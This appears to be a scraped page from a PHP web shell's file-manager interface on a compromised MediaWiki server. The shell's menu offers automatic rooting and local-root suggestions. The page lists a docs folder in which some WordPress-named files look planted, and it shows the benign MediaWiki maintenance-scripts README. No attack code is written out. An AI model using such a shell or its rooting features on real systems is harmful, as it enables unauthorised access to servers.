Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
docs /
Delete
Unzip
Name
Size
Permission
Date
Action
code-coverage
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
databases
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
html
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
kss
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
php-memcached
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
uidesign
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
.htaccess
197
B
-r--r--r--
2026-08-22 08:29
README
830
B
-rw-r--r--
2016-11-28 20:20
contenthandler.txt
10.8
KB
-rw-r--r--
2016-11-28 20:20
database.txt
8.62
KB
-rw-r--r--
2016-11-28 20:20
deferred.txt
1.63
KB
-rw-r--r--
2016-11-28 20:20
design.html
526
B
-rw-r--r--
2011-05-14 18:46
design.txt
5
KB
-rw-r--r--
2016-11-28 20:20
distributors.txt
11.28
KB
-rw-r--r--
2016-11-28 20:20
doxygen_first_page.php
480
B
-rw-r--r--
2016-11-28 20:20
export-0.1.xsd
2.28
KB
-rw-r--r--
2016-11-28 20:20
export-0.10.xsd
9.93
KB
-rw-r--r--
2016-11-28 20:20
export-0.2.xsd
3.05
KB
-rw-r--r--
2016-11-28 20:20
export-0.3.xsd
4.7
KB
-rw-r--r--
2016-11-28 20:20
export-0.4.xsd
7.21
KB
-rw-r--r--
2016-11-28 20:20
export-0.5.xsd
7.32
KB
-rw-r--r--
2016-11-28 20:20
export-0.6.xsd
7.59
KB
-rw-r--r--
2016-11-28 20:20
export-0.7.xsd
9.2
KB
-rw-r--r--
2016-11-28 20:20
export-0.8.xsd
9.73
KB
-rw-r--r--
2016-11-28 20:20
export-0.9.xsd
9.85
KB
-rw-r--r--
2016-11-28 20:20
export-demo.xml
6.22
KB
-rw-r--r--
2016-11-28 20:20
extension.schema.json
17.55
KB
-rw-r--r--
2016-11-28 20:20
globals.txt
2.14
KB
-rw-r--r--
2016-11-28 20:20
hooks.txt
164.15
KB
-rw-r--r--
2016-11-28 20:20
injection.txt
14.58
KB
-rw-r--r--
2016-11-28 20:20
language.txt
168
B
-rw-r--r--
2016-11-28 20:20
linkcache.txt
973
B
-rw-r--r--
2016-11-28 20:20
logger.txt
3.55
KB
-rw-r--r--
2016-11-28 20:20
magicword.txt
3.04
KB
-rw-r--r--
2016-11-28 20:20
maintenance.txt
1.65
KB
-rw-r--r--
2016-11-28 20:20
memcached.txt
7.73
KB
-rw-r--r--
2016-11-28 20:20
schema.txt
360
B
-rw-r--r--
2016-11-28 20:20
scripts.txt
2.21
KB
-rw-r--r--
2016-11-28 20:20
sitelist-1.0.xsd
2
KB
-rw-r--r--
2016-11-28 20:20
sitelist.txt
3.07
KB
-rw-r--r--
2016-11-28 20:20
sitescache.txt
1.02
KB
-rw-r--r--
2016-11-28 20:20
skin.txt
3.03
KB
-rw-r--r--
2016-11-28 20:20
title.txt
3.88
KB
-rw-r--r--
2016-11-28 20:20
upload.txt
135
B
-rw-r--r--
2009-08-26 19:05
wp-blog-header.php
2.74
KB
-r--r--r--
2026-08-22 08:29
wp-cron.php
2.74
KB
-rw-r--r--
2026-08-22 08:29
Save
Rename
Prior to version 1.16, maintenance scripts were a hodgepodge of code that had no cohesion or formal method of action. Beginning in 1.16, maintenance scripts have been cleaned up to use a unified class. 1. Directory structure 2. How to run a script 3. How to write your own 1. DIRECTORY STRUCTURE The /maintenance directory of a MediaWiki installation contains several subdirectories, all of which have unique purposes. 2. HOW TO RUN A SCRIPT Ridiculously simple, just call 'php someScript.php' that's in the top- level /maintenance directory. Example: php clearCacheStats.php The following parameters are available to all maintenance scripts --help : Print a help message --quiet : Quiet non-error output --dbuser : The database user to use for the script (if needed) --dbpass : Same as above (if needed) --conf : Location of LocalSettings.php, if not default --wiki : For specifying the wiki ID --batch-size : If the script supports batch operations, do this many per batch 3. HOW TO WRITE YOUR OWN Make a file in the maintenance directory called myScript.php or something. In it, write the following: ==BEGIN== <?php require_once 'Maintenance.php'; class DemoMaint extends Maintenance { public function __construct() { parent::__construct(); } public function execute() { } } $maintClass = "DemoMaint"; require_once RUN_MAINTENANCE_IF_MAIN; ==END== That's it. In the execute() method, you have access to all of the normal MediaWiki functions, so you can get a DB connection, use the cache, etc. For full docs on the Maintenance class, see the auto-generated docs at https://doc.wikimedia.org/mediawiki-core/master/php/html/classMaintenance.html